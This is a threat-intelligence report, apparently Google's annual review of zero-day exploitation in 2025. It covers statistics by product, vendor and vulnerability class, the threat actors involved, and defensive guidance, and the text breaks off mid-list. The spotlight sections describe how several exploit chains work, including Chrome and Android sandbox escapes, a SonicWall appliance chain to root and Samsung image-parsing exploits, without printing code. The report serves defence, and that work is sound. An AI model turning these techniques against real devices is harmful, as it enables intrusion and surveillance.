style="vertical-align: baseline;">This report describes what Google Threat Intelligence Group (GTIG) knows about zero-day exploitation in 2025. GTIG defines a zero-day as a vulnerability that was maliciously exploited in the wild before a patch was made publicly available. The following analysis leverages original research conducted by GTIG combined with reliable open-source reporting, though we cannot independently confirm the reports of every source. </span></p> <p><span style="vertical-align: baseline;">Research in this space is dynamic and the numbers may adjust due to the ongoing discovery of past incidents. Our analysis represents exploitation tracked by GTIG but may not reflect all zero-day exploitation. The numbers presented here reflect our best understanding of current data, and we note that all zero-days included in our 2025 dataset have patches available. GTIG acknowledges that the trends observed and discussed in this report are based on detected and disclosed zero-days, with a cutoff date of Dec. 31, 2025. </span></p> <h3><span style="vertical-align: baseline;">A Numerical Analysis</span></h3></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/zero-day-2025-fig1a.jpg" alt="Zero-days by year"> </a> <figcaption class="article-image__caption "><p data-block-key="lc11v">Figure 1: Zero-days by year</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">GTIG tracked 90 vulnerabilities that were disclosed in 2025 and exploited as zero-days. This number is consistent with a consolidating upward trend that we have observed over the last five years; the total annual volume of zero-days has fluctuated within a 60-100 range over this time period, but has remained elevated compared to pre-2021 levels. As certain categories of exploitation shift over time, whether due to vendor mitigations or newer high-value opportunities, total zero-day counts continue to appear within an expected range, rather than seeing drastic overall decreases or increases.</span></p> <h3><span style="vertical-align: baseline;">Enterprise Exploitation Expands Further in 2025</span></h3></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/zero-day-2025-fig2a.jpg" alt="2025 zero-days in end-user vs enterprise products"> </a> <figcaption class="article-image__caption "><p data-block-key="lc11v">Figure 2: 2025 zero-days in end-user vs enterprise products</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Enterprise Technologies</span></h4> <p><span style="vertical-align: baseline;">We identified 43 (48%) zero-days in enterprise software and appliances in 2025, up from 36 (46%) in 2024. This consistent proportion underscores the shift toward enterprise infrastructure as a structural change in the threat landscape, reflecting the value of tools that enable privilege escalation, high-level access, and broad scale of impact.</span></p> <ul> <li role="presentation"><strong style="vertical-align: baseline;">Security &amp; Networking:</strong><span style="vertical-align: baseline;"> These vulnerabilities made up about half (21) of the enterprise-related zero-days in 2025, remaining a prominent target for achieving code execution and unauthorized access via privileged infrastructure components. A lack of input validation and incomplete authorization processes were common flaws within these products, demonstrating how basic systemic failures continue to persist, but are fixable with proper implementation standards and approaches. Edge devices–often including security and networking devices–sit at the perimeter of an organization's infrastructure and remain high value targets</span><strong style="vertical-align: baseline;">. </strong><span style="vertical-align: baseline;">The absence of EDR technology on most edge devices, like routers, switches, and security appliances, can create a blind spot for defenders, making it an ideal attack surface. This limitation can hinder the ability to detect anomalies or gather host-based evidence once these devices are compromised. While 14 zero-days in 2025 were identified as affecting edge devices, this figure likely underrepresents the true scale of activity due to inhibited detection capabilities.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Enterprise Software:</strong><span style="vertical-align: baseline;"> High-profile exploitation of enterprise tools and virtualization technologies demonstrates that attackers are deeply embedding themselves in critical business infrastructure. Threat actors continue to pursue the most vulnerable and exposed assets to work around mitigations that may exist in specific areas of or products within an infrastructure.</span></li> </ul> <h4><span style="vertical-align: baseline;">End User Platforms and Products</span></h4> <p><span style="vertical-align: baseline;">In 2025, 52% (47) of the tracked zero-days were used to exploit end-user platforms and products.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Operating Systems (OSs):</strong><span style="vertical-align: baseline;"> OSs, including both desktop and mobile, were the most exploited product category in 2025, accounting for 44% (39) of all zero-days. This is a rise from previous years when comparing both raw numbers (31 in 2024, and 33 in 2023) and proportions of total zero-day exploitation (40% in 2024 and 33% in 2023). Desktop OS zero-days have fluctuated between 16 and 23 annually while maintaining a gradual upward trajectory, illustrating the foundational role of these platforms and the massive scale of effect permitted by OS-level exploitation.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Mobile Devices:</strong><span style="vertical-align: baseline;"> Mobile OS exploitation in particular saw a notable increase, with a total of 15 zero-days in 2025 compared to the 9 identified in 2024. Given that we observed 17 mobile-related zero-days in 2023, the following factors likely accounted for this temporary decline and the subsequent resurgence in activity:</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Multiple exploit chains discovered in 2025 included three or more vulnerabilities, inflating the number of individual vulnerabilities required to achieve a single objective.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat researchers discovered more complete exploit chains in 2025 than have been found in the past, when sometimes only partial chains or a single vulnerability was identified and could be accounted for.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors, and CSVs in particular, have found </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/intellexa-zero-day-exploits-continue"><span style="text-decoration: underline; vertical-align: baseline;">novel techniques</span></a><span style="vertical-align: baseline;"> to bypass new security boundary implementations.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Browsers:</strong><span style="vertical-align: baseline;"> Browsers accounted for less than 10% of 2025 zero-day exploitation, a marked decrease from the browser-heavy years of 2021-2022. This suggests that browser hardening measures are working. However, we also assess that attackers’ operational security has improved and therefore made their actions more difficult to observe and track, potentially reducing the volume of observed exploitation in this space.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Exploitation by Vendor</span></h3></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/zero-day-2025-fig3a.jpg" alt="2025 zero-day exploitation by vendor"> </a> <figcaption class="article-image__caption "><p data-block-key="lc11v">Figure 3: 2025 zero-day exploitation by vendor</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">2025’s exploited vendors followed the same pattern we observed last year, with big tech experiencing the most zero-day exploitation and security vendors following directly behind. Big tech companies continue to dominate the user base for consumer products, making them prime targets for exploitation, particularly in </span><a href="https://gs.statcounter.com/os-market-share/desktop/worldwide" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">desktop OSs</span></a><span style="vertical-align: baseline;">, </span><a href="https://gs.statcounter.com/browser-market-share" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">browsers</span></a><span style="vertical-align: baseline;"> and </span><a href="https://gs.statcounter.com/os-market-share/mobile/worldwide" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">mobile systems</span></a><span style="vertical-align: baseline;">. Cisco and Fortinet remain commonly targeted networking and security vendors, while Ivanti and VMware continue to see exploitation that reflects the high value threat actors place on VPNs and virtualization platforms.</span></p> <p><span style="vertical-align: baseline;">We observed 20 vendors who were exploited by just one zero-day each, further demonstrating threat actors’ success in targeting varying vendors and products to find successful footholds in desired targets.</span></p> <h3><span style="vertical-align: baseline;">Types of Exploited Vulnerabilities</span></h3> <p><span style="vertical-align: baseline;">As observed in prior years, zero-day exploitation was primarily used to achieve remote code execution, followed by gaining privilege escalation. These were especially common consequences in observed exploitation of big tech and security vendors. Both code execution and unauthorized access were common goals of network and edge infrastructure exploitation, displaying the advantage of exploiting high-privilege assets with widespread reach across systems and networks.</span></p> <p><span style="vertical-align: baseline;">2025 saw an array of both structural design flaws and pervasive implementation issues, exemplifying the omnipresence of known, yet prolific, problems. </span></p> <ul> <li role="presentation"><strong style="vertical-align: baseline;">Injection &amp; Deserialization:</strong><span style="vertical-align: baseline;"> Command injection and deserialization were critical vectors in the enterprise space. These types of vulnerabilities often allow for reliable remote code execution (RCE) without the complexity of memory corruption exploits. SQL and command injection vulnerabilities were common in web-facing enterprise appliances, providing rudimentary avenues for initial access.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Memory Corruption</strong><span style="vertical-align: baseline;">: Threat actors continued to rely on memory corruption, with memory safety issues (particularly use-after-free [UAF] and out-of-bounds write) accounting for roughly 35% of the vulnerabilities. UAF weaknesses remained a top vector for user-centered products like browsers and OS kernels.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Access Control: </strong><span style="vertical-align: baseline;">The prevalence of authentication and authorization bypass vulnerabilities highlights the difficulty edge devices face in securing both the network perimeter and their own administrative interfaces.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Logic and Design Flaws: </strong><span style="vertical-align: baseline;">Frequently exploited in enterprise appliances, these issues represent fundamental architectural weaknesses where the system’s intended logic or design is inherently insecure. Because the software is behaving as designed, these flaws are harder for vendors to detect.</span></li> </ul> <h3><span style="vertical-align: baseline;">Who Is Driving Exploitation</span></h3></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/zero-day-2025-fig4a.jpg" alt="Attributed 2025 zero-day exploitation"> </a> <figcaption class="article-image__caption "><p data-block-key="lc11v">Figure 4: Attributed 2025 zero-day exploitation</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Commercial Surveillance Vendor Exploitation Grows</span></h4> <p><span style="vertical-align: baseline;">For the first time since we started tracking zero-day exploitation, we attributed more exploitation to CSVs than to traditional state-sponsored cyber espionage groups. Despite these actors’ increased focus on operational security that likely hinders discovery, this continues to reflect a trend we began to observe over the last several years–a growing proportion of zero-day exploitation is conducted by CSVs and/or their customers, demonstrating a slow but sure movement in the landscape. Historically, traditional state-sponsored cyber espionage groups have been the most prolific attributed users of zero-day vulnerabilities. Over the last few years, the increase of zero-day exploitation attributed to CSVs and their customers has demonstrated the growing ability of these vendors to provide zero-day access to a wider range of threat actors than ever before. </span></p> <p><span style="vertical-align: baseline;">GTIG has reported </span><a href="https://blog.google/threat-analysis-group/commercial-surveillance-vendors-google-tag-report/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">extensively</span></a><span style="vertical-align: baseline;"> on the capabilities CSVs provide their clients as well as how many CSV customers use zero-day exploits in attacks which erode civil liberties and human rights. In late 2025, we </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/intellexa-zero-day-exploits-continue"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> on how Intellexa, a prolific procurer and user of zero-days, adapted its operations and tool suite and continues to deliver extremely capable spyware to high paying customers. </span></p> <h4><span style="vertical-align: baseline;">People’s Republic of China (PRC)-Nexus Cyber Espionage Groups Still Most Prolific </span></h4> <p><span style="vertical-align: baseline;">Although the proportion of 2025 zero-day exploitation that we attributed to traditional state-sponsored cyber espionage groups was lower than in previous years, these groups remained significant developers and users of zero-day exploits in 2025. Consistent with the trend we have observed for nearly a decade, PRC-nexus cyber espionage groups remained the most prolific users of zero-days across state actors in 2025. We attributed the use of at least 10 zero-days to assessed PRC-nexus cyber espionage groups. This was double what we attributed to these groups in 2024, but below the 12 zero-days we attributed in 2023. PRC-nexus espionage zero-day exploitation continued to focus on edge and networking devices that are difficult to monitor, allowing them to maintain long-term footholds in strategic networks. Examples of this include the exploitation of </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2025-21590 by UNC3886</span></a><span style="vertical-align: baseline;"> and the exploitation of </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2025-0282 by UNC5221</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">Observed mass exploitation of vulnerabilities suggests that PRC-nexus espionage operators are increasingly adept at developing, sharing, and distributing exploits among themselves. Historically, zero-day exploits were closely held and leveraged only by the most resourced threat groups. Over time, however, we have observed that an increasing number of activity clusters are exploiting vulnerabilities closer to public disclosure, indicating that PRC-nexus espionage operators have potentially reduced the time to both develop exploits and distribute them among otherwise separate groups. This is reflected not only in the gradual proliferation of exploit code targeting specific vulnerabilities, but also by the shrinking gap between the public disclosure of n-day vulnerabilities and their widespread exploitation by multiple groups. </span></p> <p><span style="vertical-align: baseline;">In sharp contrast to 2024, during which we attributed the exploitation of five zero-days to North Korean state-sponsored threat actors, we did not attribute any zero-days to North Korean groups in 2025.</span></p> <h4><span style="vertical-align: baseline;">Financially Motivated Exploitation Spikes</span></h4> <p><span style="vertical-align: baseline;">We tracked the exploitation in 2025 of nine zero-days by likely or confirmed financially motivated threat groups, including the reported exploitation of two zero-days in operations that led to ransomware deployment. This almost ties the previous high of 10 zero-days we attributed to financially motivated groups in 2023 and is nearly double the five zero-days we attributed to financially motivated actors in 2024. Although the total volume of zero-day exploitation we have attributed to financially motivated groups has varied year over year, the sustained presence of these threat actors in the zero-day landscape reflects their continued investment in zero-day exploit development and deployment. Financially motivated actors, including ransomware affiliates, were linked to a substantial number of enterprise exploits, reflecting a trend we observed across multiple motivations.</span></p> <ul> <li><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">We observed zero-day exploitation by FIN11 or associated clusters in four of the last five years–2021, 2023, 2024, and 2025. In late September 2025, GTIG began tracking a new, large-scale extortion campaign by a threat actor claiming affiliation with the CL0P extortion brand, which has predominantly been used by FIN11. The actor sent a high volume of emails to executives at numerous organizations, alleging the theft of sensitive data from the victims' Oracle E-Business Suite (EBS) environments. </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation"><span style="text-decoration: underline; vertical-align: baseline;">Our analysis</span></a><span style="vertical-align: baseline;"> indicated that the CL0P extortion campaign followed months of intrusion activity targeting EBS customer environments. The threat actor exploited CVE-2025-61882 and/or CVE-2025-61884 as a zero-day against Oracle EBS customers as early as Aug. 9, 2025, weeks before a patch was available, with additional suspicious activity dating back to July 10, 2025.</span></span></li> <li><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">GTIG identified UNC2165, a financially motivated group that overlaps with public reporting on Evil Corp and has prominent members in Russia, leveraging </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2025-8088</span></a><span style="vertical-align: baseline;"> to distribute malware in mid-July 2025. This activity marked the first instance where we observed UNC2165 use a zero-day for initial access. Additional evidence from underground activity and VirusTotal RAR archive submissions indicate that CVE-2025-8088 was also exploited during this same period by other actors, including a threat cluster with suspected overlaps with CIGAR/UNC4895 (publicly reported as RomCom). UNC4895 is another Russian threat group that has conducted both financially motivated and espionage operations, including the exploitation of two other zero-days in 2024.</span></span></span></li> </ul> <h3><span style="vertical-align: baseline;">Spotlights: Notable Threat Actor Activity and Techniques</span></h3> <h4><span style="vertical-align: baseline;">Browser Sandbox Escapes</span></h4> <p><span style="vertical-align: baseline;">The discovery of various browser sandbox escapes in 2025 provided an opportunity to evaluate current trends and developments in this area. Analysis of those identified this year revealed a significant trend: none were generic to the browser sandbox itself (e.g., CVE-2021-37973, </span><a href="https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2023/CVE-2023-6345.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2023-6345</span></a><span style="vertical-align: baseline;">, CVE-2023-2136); instead, these sandbox escapes were specifically designed to exploit components of either the underlying operating system or hardware used. This section gives a brief technical overview of these vulnerabilities.</span></p> <h5><span style="vertical-align: baseline;">Operating System-Based Sandbox Escapes</span></h5> <p><a href="https://issues.chromium.org/issues/405143032" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2025-2783</span></a><span style="vertical-align: baseline;"> targeted the Chrome sandbox on Windows. The vulnerability was caused by the improper handling of sentinel OS handles (-2) that weren’t properly validated. By manipulating inter-process communication (IPC) messages via the ipcz framework, </span><a href="https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">an attacker</span></a><span style="vertical-align: baseline;"> could relay these special handles back to a renderer process. The exploit allowed a compromised renderer to gain access to handles, leading to code injection within more privileged processes and ultimately to a sandbox escape.</span></p> <p><span style="vertical-align: baseline;">CVE-2025-48543 affected the Android Runtime (ART), the system that translates application bytecode into native machine instructions to improve execution speed and power efficiency. A UAF vulnerability occurred during the deserialization of Java objects, such as abstract classes, that should not be instantiable in the first place. The most notable aspect of the exploit is how the bug can be reached from a compromised Chrome renderer. On recent Android versions, the exploit sent a Binder transaction to deliver a serialized payload embedded into a Notification Parcel object. The subsequent </span><a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/core/java/android/app/Notification.java;l=2810" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">unparceling</span></a><span style="vertical-align: baseline;"> of the malicious object caused a UAF in ART, leading to arbitrary code execution within system_server, a service that operates with system-level privileges. While this specific vulnerability class and attack vector may be new publicly, we have observed </span><a href="https://i.blackhat.com/EU-22/Wednesday-Briefings/EU-22-Ke-Android-Parcels-Introducing-Android-Safer-Parcel.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Parcel mismatch</span></a><span style="vertical-align: baseline;"> n-day vulnerabilities being exploited to achieve Chrome sandbox escapes using the same attack vector in the past.</span></p> <h5><span style="vertical-align: baseline;">Device-Specific Sandbox Escapes</span></h5> <p><span style="vertical-align: baseline;">CVE-2025-27038 is a UAF vulnerability in the Qualcomm Adreno GPU user-land library that can be triggered through a sequence of WebGL commands followed by a specifically crafted glFenceSync call. The vulnerability allows attackers to achieve code execution within the Chrome GPU process on Android devices. We observed in-the-wild exploitation of this vulnerability in a chain with vulnerabilities in the Chrome renderer (CVE-2024-0519) and the KGSL driver (CVE-2023-33106).</span></p> <p><span style="vertical-align: baseline;">In a similar instance, CVE-2025-6558 targeted the Mali GPU user-land library. This vulnerability was triggered by a sequence of OpenGLES calls that were not properly validated by the browser. Specifically, an out-of-bounds write was caused within the user-land driver due to the issuance of glBufferData() with the GL_TRANSFORM_FEEDBACK_BUFFER parameter while a previous glBeginTransformFeedback() operation remained active. Google addressed this issue in ANGLE by </span><a href="https://chromium.googlesource.com/angle/angle.git/+/2f8193ecfe1ed464374ae56235cfdc112343f9c3" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">implementing</span></a><span style="vertical-align: baseline;"> validation to invalidate this specific call sequence. We observed in-the-wild exploitation of this vulnerability in a chain with vulnerabilities in the Chrome renderer (CVE-2025-5419) and in the Linux kernel's posix CPU timers implementation (CVE-2025-38352).</span></p> <p><span style="vertical-align: baseline;">Additionally, CVE-2025-14174 is a vulnerability that affected the Metal backend on Apple devices. In that case, ANGLE incorrectly communicated a buffer size during the implementation of texImage2D operation, resulting in an out-of-bounds memory access within the Metal GPU user-mode driver.</span></p> <h4><span style="vertical-align: baseline;">SonicWall Full-Chain Exploit</span></h4> <p><span style="vertical-align: baseline;">In late 2025, GTIG collected a multi-stage exploit for SonicWall Secure Mobile Access (SMA) 1000 series appliances. The exploit chain leveraged multiple vulnerabilities to provide either authenticated or unauthenticated remote code execution as </span><code style="vertical-align: baseline;">root</code><span style="vertical-align: baseline;"> on a targeted appliance, including one that was being leveraged as zero-day.</span></p> <h5><span style="vertical-align: baseline;">Authentication Bypass (n-day)</span></h5> <p><span style="vertical-align: baseline;">The exploit can be leveraged with or without an authenticated </span><code style="vertical-align: baseline;">JSESSIONID</code><span style="vertical-align: baseline;"> session token. When executed without a token, the exploit attempts to get one for the built-in </span><code style="vertical-align: baseline;">admin</code><span style="vertical-align: baseline;"> user by exploiting a weakness in SSO token generation within the Central Management Server feature in SMA 1000.</span></p> <p><span style="vertical-align: baseline;">This vulnerability was </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">patched</span></a><span style="vertical-align: baseline;"> as a part of CVE-2025-23006. It was reported to SonicWall by Microsoft Threat Intelligence Center (MSTIC), and was reportedly exploited in the wild prior to it being patched in January 2025. GTIG is currently unable to assess if prior exploitation of this vulnerability is linked to use of this new exploit chain.</span></p> <h5><span style="vertical-align: baseline;">Remote Code Execution (n-day)</span></h5> <p><span style="vertical-align: baseline;">Once the exploit has a valid session cookie for the target, it attempts to attain remote code execution through a deserialization vulnerability, where an object is serialized and encoded with Base64, and then passed between the web application client and the appliance server without any integrity checks. This allows an attacker to forge a malicious Java object and send it to the server, which parses the object and causes arbitrary Java bytecode to be executed. The exploit leverages this primitive to run arbitrary shell commands using a payload generated by </span><a href="https://github.com/frohoff/ysoserial" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">ysoserial</span></a><span style="vertical-align: baseline;">, a common tool used to assist with exploiting Java serialization-related vulnerabilities.</span></p> <p><span style="vertical-align: baseline;">This vulnerability was patched by encrypting objects with AES-256-ECB prior to sending them to the client, using an ephemeral key generated randomly at server startup and stored in-memory. Payloads mutated without knowledge of the key won't be successfully parsed, which mitigates the risk of deserializing untrusted objects without another vulnerability leaking the encryption key. The patch was silently released in March 2024 without a CVE.</span></p> <h5><span style="vertical-align: baseline;">Local Privilege Escalation (0-day)</span></h5> <p><span style="vertical-align: baseline;">After exploiting the aforementioned deserialization vulnerability, the exploit is able to execute arbitrary shell commands as the </span><code style="vertical-align: baseline;">mgmt-server</code><span style="vertical-align: baseline;"> user, which runs the Java process hosting the management web application. To escalate to root privileges, the exploit used a zero-day in </span><code style="vertical-align: baseline;">ctrl-service</code><span style="vertical-align: baseline;">, a custom XML-RPC service written in Python and bound to a loopback address on port 8081. This makes it inaccessible directly to a remote attacker, but accessible after already gaining code execution on the device at a lower privilege level. While this vulnerability could be exploited when combined with a newly discovered RCE vulnerability, or with direct console/SSH access to the appliance, we've presently only observed it being chained with the RCE exploit previously discussed.</span></p> <p><span style="vertical-align: baseline;">GTIG reported this vulnerability to SonicWall, who published a </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0019" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">patch</span></a><span style="vertical-align: baseline;"> for it in December 2025 as CVE-2025-40602. To fix this vulnerability, SonicWall added signature verification to the service to prevent it from executing unsigned files.</span></p> <h4><span style="vertical-align: baseline;">DNG Vulnerabilities</span></h4> <p><span style="vertical-align: baseline;">This section specifically examines samples exploiting CVE-2025-21042, a vulnerability for which GTIG has not confirmed zero-day exploitation; however, we include this discussion of the underlying exploitation techniques because zero-days CVE-2025-21043 and CVE-2025-43300 share identical exploitation conditions.</span></p> <p><span style="vertical-align: baseline;">Between July 2024 and February 2025, several suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, these samples came to the attention of Google Threat Intelligence Group. Upon investigation of these images, we discovered that they were digital negative (DNG) images targeting the Quram library, an image parsing library specific to Samsung devices.  </span></p> <p><span style="vertical-align: baseline;">The VirusTotal submission filenames of several of these exploits indicated that these images were received over WhatsApp. The final payload, however, indicated that the exploit expects to run within the </span><code style="vertical-align: baseline;">com.samsung.ipservice</code><span style="vertical-align: baseline;"> process. This is a Samsung-specific system service responsible for providing “intelligent” or AI-powered features to other Samsung applications, and will periodically scan and parse images and videos in Android’s MediaStore.</span></p> <p><span style="vertical-align: baseline;">When WhatsApp receives and downloads an image, it will insert the image in MediaStore. This permits downloaded WhatsApp images (and videos) to hit the image parsing attack surface within the </span><code style="vertical-align: baseline;">com.samsung.ipservice</code><span style="vertical-align: baseline;"> application. However, WhatsApp does not intend to automatically download images from untrusted contacts. Without additional bypasses, and assuming the image is sent by an untrusted contact, a target would have to click the image to trigger the download and have it added to the MediaStore. This classifies as a “1-click” exploit. GTIG does not have any knowledge or evidence of the attacker using such a bypass to achieve 0-click exploitation.</span></p> <p><code style="vertical-align: baseline;">com.samsung.ipservice</code><span style="vertical-align: baseline;"> comes with a proprietary image parsing library named “Quram,” which is written in C++. The image parsing is done in-process, unsandboxed with respect to the service’s privilege. This breaks the </span><a href="https://chromium.googlesource.com/chromium/src/+/main/docs/security/rule-of-2.md" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Rule Of 2</span></a><span style="vertical-align: baseline;"> and means a single memory corruption vulnerability can grant attackers access to everything to which </span><code style="vertical-align: baseline;">com.samsung.ipservice</code><span style="vertical-align: baseline;"> has access, i.e. a phone’s entire MediaStore.</span></p> <p><span style="vertical-align: baseline;">This is exactly what the attackers did when they discovered a powerful memory corruption vulnerability (CVE-2025-21042), which allows controlled out-of-bounds write at controlled offsets from a heap buffer. With this single vulnerability, they were able to obtain code execution within the </span><code style="vertical-align: baseline;">com.samsung.ipservice</code><span style="vertical-align: baseline;"> process and execute a payload with that process’ privileges.</span></p> <p><span style="vertical-align: baseline;">There were no significant hurdles for the attackers aside from some ASLR bypassing tricks. No control flow integrity mitigations, like pointer authentication code (PAC) or branch target identification (BTI), are compiled into the Quram library. This allowed the attackers to use arbitrary addresses as jump-oriented programming (JOP) gadgets and construct a bogus vtable. The scudo allocator also failed to engage proper hardening techniques. The heap spraying primitives - more or less inherent to the DNG format - are powerful and allow for a predictable heap layout, even with scudo’s randomization strategy. The absence of scudo’s “quarantine” feature on Android is also convenient for deterministically reclaiming a free’d allocation.</span></p> <p><span style="vertical-align: baseline;">This case illustrates how certain image formats can provide strong primitives out of the box for turning a single memory corruption bug into 0-click ASLR bypasses and resulting remote code execution. By corrupting the bounds of the pixel buffer using CVE-2025-21042, subsequent exploitation can occur by taking advantage of the DNG specification and its implementation.</span></p> <p><span style="vertical-align: baseline;">The bug exploited in this case is both powerful and quite shallow. As </span><a href="https://projectzero.google/reporting-transparency.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Project Zero’s Reporting Transparency</span></a><span style="vertical-align: baseline;"> illustrates, several other vulnerabilities in the same component have been discovered over the recent months.</span></p> <p><span style="vertical-align: baseline;">These types of exploits do not need to be part of long and complex exploit chains to achieve something useful for attackers. By finding ways to reach the right attack surface with a single relevant vulnerability, attackers are able to access all the images and videos of an Android’s MediaStore, posing a powerful capability for surveillance vendors.</span></p> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">A more detailed technical analysis of the exploit can be found on </span><a href="https://projectzero.google/2025/12/android-itw-dng.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Project Zero’s blog</span></a><span style="vertical-align: baseline;">.</span></span></span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Prioritizing Defenses and Mitigating Zero-Day Threats</span></h3> <p><span style="vertical-align: baseline;">Defenders should prepare for </span><span style="font-style: italic; vertical-align: baseline;">when, not if,</span><span style="vertical-align: baseline;"> a compromise happens. </span><a href="https://services.google.com/fh/files/misc/m-trends-2025-en.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">GTIG continues to observe vulnerability exploitation as the number one initial access vector in Mandiant incident response investigations</span></a><span style="vertical-align: baseline;">, outnumbering other vectors like stolen credentials and phishing. System architectures should be designed and built with ingrained security awareness, enabling inherent segmentation and least privilege access. Comprehensive defensive measures as well as response efforts require a real-time inventory of all assets to be audited and maintained. While not preventative, continuous monitoring and anomaly detection, within both systems and networks, paired with refined and actionable alerting capabilities is a real-time way to detect and act against threats as they occur. </span></p> <p><span style="vertical-align: baseline;">The following is a non-comprehensive set of approaches and guidelines for defending against zero-day exploitation on both personal devices and within organizational infrastructure:</span></p> <p><span style="vertical-align: baseline;">1. Architectural Hardening &amp; Surface Reduction</span></p> <ul> <li style="list-style-type: none;"> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Infrastructure:</span></p> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ensure your DMZ, firewalls, and VPNs are properly segmented from critical assets, including the core network and domain controllers, in order to prevent lateral movement from compromised external components.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor execution flow within applications in order to block unauthorized database queries and shell commands</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Do not expose network ports of devices to the internet when not strictly required</span></p> </li> </ul> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Personal devices:</span></p> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Turn off the device and/or leave the device at home when under increased risk of exploitation.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Put the device in before first unlock (BFU) mode and USB restricted mode when under increased risk of physical attacks.</span></p> </li> <li 